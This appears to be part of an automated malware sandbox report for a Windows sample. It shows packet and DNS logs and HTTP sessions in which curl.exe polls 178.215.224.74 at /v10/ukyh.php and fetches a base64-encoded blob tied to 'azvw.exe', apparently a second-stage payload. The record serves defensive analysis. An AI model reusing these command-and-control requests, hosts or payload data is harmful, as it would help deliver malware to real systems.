                                      Nov 24, 2024 12:07:35.734075069 CET5008880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:35.774267912 CET8050087178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:35.774872065 CET5008780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:35.794400930 CET8050086178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:35.794467926 CET5008680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:35.853909016 CET8050088178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:35.854010105 CET5008880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:35.854590893 CET5008880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:35.894916058 CET8050087178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:35.895025969 CET5008780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:35.897638083 CET8050080178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:35.897701979 CET5008080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:35.974149942 CET8050088178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:36.122678041 CET5008980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:36.242386103 CET8050089178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:36.242503881 CET5008980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:36.242769957 CET5008980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:36.362838030 CET8050089178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:37.161428928 CET8050088178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:37.165874004 CET5008880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:37.286082983 CET8050088178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:37.288933039 CET5008880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:37.325731993 CET5009080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:37.445391893 CET8050090178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:37.448929071 CET5009080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:37.449019909 CET5009080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:37.503277063 CET8050089178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:37.504093885 CET5008980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:37.568696976 CET8050090178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:37.624134064 CET8050089178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:37.624223948 CET5008980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.144076109 CET5009180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.263940096 CET8050091178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:38.264028072 CET5009180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.264523029 CET5009180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.384305000 CET8050091178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:38.762264967 CET8050090178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:38.764137030 CET5009080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.783267021 CET5008080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.783466101 CET5009280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.884510994 CET8050090178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:38.886018038 CET5009080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.902826071 CET8050080178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:38.903040886 CET8050092178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:38.903204918 CET5009280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:38.903289080 CET5009280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:39.023010015 CET8050092178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:39.572587013 CET8050091178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:39.576016903 CET5009180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:39.696253061 CET8050091178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:39.696394920 CET5009180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:39.960654974 CET5009380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:40.080435991 CET8050093178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:40.080519915 CET5009380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:40.080641985 CET5009380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:40.200155973 CET8050093178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:40.264004946 CET8050092178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:40.264106989 CET5009280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:41.395768881 CET8050093178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:41.396303892 CET5009380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:41.483956099 CET5009480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:41.516283035 CET8050093178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:41.516351938 CET5009380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:41.603574991 CET8050094178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:41.603682995 CET5009480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:41.603795052 CET5009480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:41.723341942 CET8050094178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:42.956691027 CET8050094178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:42.957254887 CET5009480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:43.023401022 CET5009580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:43.077328920 CET8050094178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:43.077590942 CET5009480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:43.143100023 CET8050095178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:43.143260002 CET5009580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:43.143423080 CET5009580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:43.263025999 CET8050095178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:44.452377081 CET8050095178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:44.454019070 CET5009580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:44.496596098 CET5009680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:44.574136019 CET8050095178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:44.574244976 CET5009580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:44.616386890 CET8050096178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:44.616492033 CET5009680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:44.616657019 CET5009680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:44.736216068 CET8050096178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:45.275996923 CET8050092178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:45.276138067 CET5009280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:45.934109926 CET8050096178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:45.934340000 CET5009680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:46.320463896 CET5009780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:46.440349102 CET8050097178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:46.440495014 CET5009780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:46.440603018 CET5009780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:46.560297012 CET8050097178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:47.755523920 CET8050097178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:47.756071091 CET5009780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:47.822161913 CET5009880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:47.876347065 CET8050097178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:47.876676083 CET5009780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:47.941829920 CET8050098178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:47.941930056 CET5009880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:47.944969893 CET5009880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:48.064575911 CET8050098178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:49.258510113 CET8050098178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:49.259243011 CET5009880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:49.354764938 CET5009980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:49.379308939 CET8050098178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:49.379389048 CET5009880192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:49.474443913 CET8050099178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:49.474581957 CET5009980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:49.474704981 CET5009980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:49.597441912 CET8050099178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:50.828705072 CET8050099178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:50.829289913 CET5009980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:50.839612007 CET5009680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:50.840012074 CET5010080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:50.936054945 CET8050096178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:50.936424017 CET5009680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:50.949328899 CET8050099178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:50.949450016 CET5009980192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:50.959227085 CET8050096178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:50.959743977 CET8050100178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:50.959878922 CET5010080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:50.960824013 CET5010080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:51.080357075 CET8050100178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:52.320950985 CET8050100178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:52.321115017 CET5010080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:52.684757948 CET5010180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:52.804393053 CET8050101178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:52.804517031 CET5010180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:52.804640055 CET5010180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:52.925225973 CET8050101178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:54.155518055 CET8050101178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:54.156119108 CET5010180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:54.219724894 CET5010280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:54.276546955 CET8050101178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:54.276829004 CET5010180192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:54.339402914 CET8050102178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:54.339680910 CET5010280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:54.339731932 CET5010280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:54.459311008 CET8050102178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:55.645973921 CET8050102178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:55.646455050 CET5010280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:55.728702068 CET5010380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:55.766377926 CET8050102178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:55.766500950 CET5010280192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:55.848392010 CET8050103178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:55.848476887 CET5010380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:55.850605965 CET5010380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:55.970151901 CET8050103178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:57.150598049 CET8050103178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:57.151093960 CET5010380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:57.185209036 CET5010080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:57.185774088 CET5010480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:57.277064085 CET8050103178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:57.277160883 CET5010380192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:57.305365086 CET8050100178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:57.305552006 CET5010080192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:57.305670023 CET8050104178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:57.305772066 CET5010480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:57.317951918 CET5010480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:07:57.439800024 CET8050104178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:58.648082972 CET8050104178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:07:58.648320913 CET5010480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:00.772228003 CET5010580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:00.892282963 CET8050105178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:00.892426968 CET5010580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:00.892553091 CET5010580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:01.012343884 CET8050105178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:02.229844093 CET8050105178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:02.230614901 CET5010580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:02.300915956 CET5010680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:02.352431059 CET8050105178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:02.352521896 CET5010580192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:02.420677900 CET8050106178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:02.420819044 CET5010680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:02.420949936 CET5010680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:02.542458057 CET8050106178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:03.642329931 CET8050104178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:03.642424107 CET5010480192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:03.778614998 CET8050106178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:03.779740095 CET5010680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:03.836277008 CET5010780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:03.900804043 CET8050106178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:03.900914907 CET5010680192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:03.956121922 CET8050107178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:03.956267118 CET5010780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:03.956661940 CET5010780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:04.076272964 CET8050107178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:05.314522028 CET8050107178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:05.315063953 CET5010780192.168.2.5178.215.224.74
                                      Nov 24, 2024 12:08:05.435389042 CET8050107178.215.224.74192.168.2.5
                                      Nov 24, 2024 12:08:05.435497046 CET5010780192.168.2.5178.215.224.74
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 24, 2024 12:04:01.331515074 CET6546853192.168.2.51.1.1.1
                                      Nov 24, 2024 12:04:01.557060957 CET53654681.1.1.1192.168.2.5
                                      Nov 24, 2024 12:04:17.225684881 CET5471653192.168.2.51.1.1.1
                                      Nov 24, 2024 12:04:17.364928961 CET53547161.1.1.1192.168.2.5
                                      Nov 24, 2024 12:04:32.015414000 CET6259953192.168.2.51.1.1.1
                                      Nov 24, 2024 12:04:32.154036999 CET53625991.1.1.1192.168.2.5
                                      Nov 24, 2024 12:05:47.096450090 CET53634591.1.1.1192.168.2.5
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Nov 24, 2024 12:04:01.331515074 CET192.168.2.51.1.1.10x105Standard query (0)EaUMrTLEnhJoi.EaUMrTLEnhJoiA (IP address)IN (0x0001)false
                                      Nov 24, 2024 12:04:17.225684881 CET192.168.2.51.1.1.10xe447Standard query (0)EaUMrTLEnhJoi.EaUMrTLEnhJoiA (IP address)IN (0x0001)false
                                      Nov 24, 2024 12:04:32.015414000 CET192.168.2.51.1.1.10x52b1Standard query (0)EaUMrTLEnhJoi.EaUMrTLEnhJoiA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Nov 24, 2024 12:04:01.557060957 CET1.1.1.1192.168.2.50x105Name error (3)EaUMrTLEnhJoi.EaUMrTLEnhJoinonenoneA (IP address)IN (0x0001)false
                                      Nov 24, 2024 12:04:13.372970104 CET1.1.1.1192.168.2.50x3f78No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                      Nov 24, 2024 12:04:13.372970104 CET1.1.1.1192.168.2.50x3f78No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                      Nov 24, 2024 12:04:17.364928961 CET1.1.1.1192.168.2.50xe447Name error (3)EaUMrTLEnhJoi.EaUMrTLEnhJoinonenoneA (IP address)IN (0x0001)false
                                      Nov 24, 2024 12:04:32.154036999 CET1.1.1.1192.168.2.50x52b1Name error (3)EaUMrTLEnhJoi.EaUMrTLEnhJoinonenoneA (IP address)IN (0x0001)false
                                      Nov 24, 2024 12:05:47.096450090 CET1.1.1.1192.168.2.50xef12Name error (3)GyxNFpxuLvDE.GyxNFpxuLvDEnonenoneA (IP address)IN (0x0001)false
                                      • 178.215.224.252
                                      • 178.215.224.74
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549732178.215.224.252806784C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:04:25.297477961 CET98OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.252
                                      User-Agent: curl/7.83.1
                                      Accept: */*


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549793178.215.224.74807056C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:04:53.240776062 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:04:54.608581066 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:04:54 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549798178.215.224.74804952C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:04:55.032725096 CET97OUTGET /v10/ukyh.php?jspo=5 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:04:56.343988895 CET199INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:04:56 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 0
                                      Content-Type: text/html; charset=UTF-8


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.549800178.215.224.74803712C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:04:56.618705034 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:04:57.936877966 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:04:57 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.549806178.215.224.74805632C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:04:58.276925087 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:04:59.633570910 CET203INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:04:59 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Content-Length: 4
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 62 68 6c 6f
                                      Data Ascii: bhlo


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.549812178.215.224.74806948C:\Windows\SysWOW64\curl.exe
                                      TimestampBytes transferredDirectionData
                                      Nov 24, 2024 12:04:59.965029001 CET118OUTGET /v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D HTTP/1.1
                                      Host: 178.215.224.74
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Nov 24, 2024 12:05:01.264620066 CET1236INHTTP/1.1 200 OK
                                      Date: Sun, 24 Nov 2024 11:05:01 GMT
                                      Server: Apache/2.4.41 (Ubuntu)
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Vary: Accept-Encoding
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 34 38 65 33 63 0d 0a 56 46 5a 78 55 30 6c 44 54 55 46 4a 51 30 4e 4e 51 55 4e 44 51 79 30 74 4f 6b 46 44 52 47 39 44 51 30 46 44 51 55 46 42 51 55 46 52 51 30 6c 44 51 55 46 42 51 30 4e 42 51 55 4e 42 51 55 46 44 51 55 6c 42 51 30 4e 42 51 55 4e 42 51 30 4e 44 51 55 4e 44 51 30 46 42 51 55 4e 4a 51 30 46 42 53 55 4e 44 53 55 46 44 51 30 4d 32 51 30 4e 42 51 30 6b 38 5a 48 64 6e 4e 6b 46 30 51 57 35 4f 53 57 42 76 51 46 52 4e 4d 47 70 55 52 32 68 79 59 33 6c 43 64 57 4e 6c 4f 57 78 68 62 55 5a 32 53 55 56 4d 61 6d 4a 76 4e 33 52 6b 51 30 4a 72 55 6c 46 43 65 57 78 56 4e 6d 39 68 56 54 5a 6c 55 45 63 37 56 45 74 50 4f 58 52 59 52 31 64 31 52 46 45 77 53 30 70 44 53 55 4e 42 51 55 46 44 51 30 46 45 51 31 56 7a 57 6b 64 6f 54 45 39 74 52 44 52 52 65 48 46 41 5a 30 64 4e 4e 47 56 61 4e 57 6c 35 4e 55 34 32 54 58 70 35 51 47 64 4e 54 54 52 70 57 6a 52 6f 54 57 39 45 4a 7a 42 30 63 6b 4a 6e 56 55 30 32 5a 31 68 7a 61 6c 39 6f 52 6a 52 56 65 48 4e 43 59 30 70 4d 4e 6c 6c 61 61 31 78 50 62 55 51 33 53 56 52 [TRUNCATED]
                                      Data Ascii: 48e3cVFZxU0lDTUFJQ0NNQUNDQy0tOkFDRG9DQ0FDQUFBQUFRQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0M2Q0NBQ0k8ZHdnNkF0QW5OSWBvQFRNMGpUR2hyY3lCdWNlOWxhbUZ2SUVMamJvN3RkQ0JrUlFCeWxVNm9hVTZlUEc7VEtPOXRYR1d1RFEwS0pDSUNBQUFDQ0FEQ1VzWkdoTE9tRDRReHFAZ0dNNGVaNWl5NU42TXp5QGdNTTRpWjRoTW9EJzB0ckJnVU02Z1hzal9oRjRVeHNCY0pMNllaa1xPbUQ3SVRvamFVTTRlWlVtbGhpS1F6eUBhSUFDQ0NDQ0NBQ0lJQ0NBQ0FBQUFBQUNJQ0FBQUNDQUJTUlFBQ1RJRUZDRkNRSTJLQ0FDQ0NBQUFDSU1BQUx1R0RBU1tDQ0xDQkNJTGVDUUNBQUFBQWVHb0BBQUFTQ0FBQzRBRUNBSUJDQ0FBU0FDQ0NFQ0NDQkFBQ0lDQUFJQ0NNQUNDQ0NDQ0FDSUxDQ3dDQUVBQUFnS2NGQUFNQ0NBQUNBQkFDQUpBQ0NBQUNFQ0NDRUNDQ0FBQUNJQEFBSUNDSUFDQ0NDQ0NBQ0xJMUNnQFFBQUFBQUNJQ0FBQUNDQUFDQUFBQ0FJQUNDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FBQ0FDQ0NBQ0NDQUFBQ0lDQUFJQ0NJNENHQ3RDR0FDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NDNTJaWmoyQUNDQ3dNTUBJQ0FRSUNDSTBDR0NDQENBQ0lJQ0NBQ0FBQUFBQUNJQ0FDQUNDR0F3Y21SamRPRUNDSUpqQUNDQzRDR0NBSEFDSUNEZ0lTQ0lBQ0NDQ0NDQUNJSUNDQUBBQUFCQUxvWmpkR0VDQ0FDR1
                                      Nov 24, 2024 12:05:01.264697075 CET1236INData Raw: 6c 6e 52 55 4e 42 54 6b 46 42 51 30 46 43 51 30 46 44 51 30 4e 56 51 30 74 44 51 55 46 42 51 30 6c 44 51 55 46 4a 51 30 4e 4a 51 55 4e 44 51 31 4e 44 51 30 46 31 53 55 6c 44 51 30 46 44 51 55 46 42 51 55 46 42 51 30 6c 44 51 55 46 42 51 30 4e 42
                                      Data Ascii: lnRUNBTkFBQ0FCQ0FDQ0NVQ0tDQUFBQ0lDQUFJQ0NJQUNDQ1NDQ0F1SUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0NDQ0NBQ0lJQ0NBQ0FBQUFBQUNJQ0FBQUNDQUFDQUFBQ0FJQUNDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDS
                                      Nov 24, 2024 12:05:01.264734983 CET1236INData Raw: 6c 42 51 30 4e 44 51 30 4e 44 51 55 4e 4a 53 55 4e 44 51 55 4e 42 51 55 46 42 51 55 46 44 53 55 4e 42 51 55 46 44 51 30 46 42 51 30 46 42 51 55 4e 42 53 55 46 44 51 30 46 42 51 30 46 44 51 30 4e 42 51 30 4e 44 51 55 46 42 51 30 6c 44 51 55 46 4a
                                      Data Ascii: lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FBQ0FDQ0NBQ0NDQUFBQ0lDQUFJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0NDQ0NBQ0lJQ0NBQ0FBQUFBQUNJQ0FBQUNDQUFDQUFBQ0FJQUNDQUFDQUNDQ0FDQ0NBQ
                                      Nov 24, 2024 12:05:01.264767885 CET1236INData Raw: 46 44 51 55 46 42 51 30 46 4a 51 55 4e 44 51 55 46 44 51 55 4e 44 51 30 46 44 51 30 4e 42 51 55 46 44 53 55 4e 42 51 55 6c 44 51 30 6c 42 51 30 4e 44 51 30 4e 44 51 55 4e 4a 53 55 4e 44 51 55 4e 42 51 55 46 42 51 55 46 44 53 55 4e 42 51 55 46 44
                                      Data Ascii: FDQUFBQ0FJQUNDQUFDQUNDQ0FDQ0NBQUFDSUNBQUlDQ0lBQ0NDQ0NDQUNJSUNDQUNBQUFBQUFDSUNBQUFDQ0FBQ0FBQUNBSUFDQ0FBQ0FDQ0NBQ0NDQUFBQ0lDQUFJQ0NJQUNDQ0NDQ0FDSUlDQ0FDQUFBQUFBQ0lDQUFBQ0NBQUNBQUFDQUlBQ0NBQUNBQ0NDQUNDQ0FBQUNJQ0FBSUNDSUFDQ0NDQ0NBQ0lJQ0NBQ0FBQUFBQ
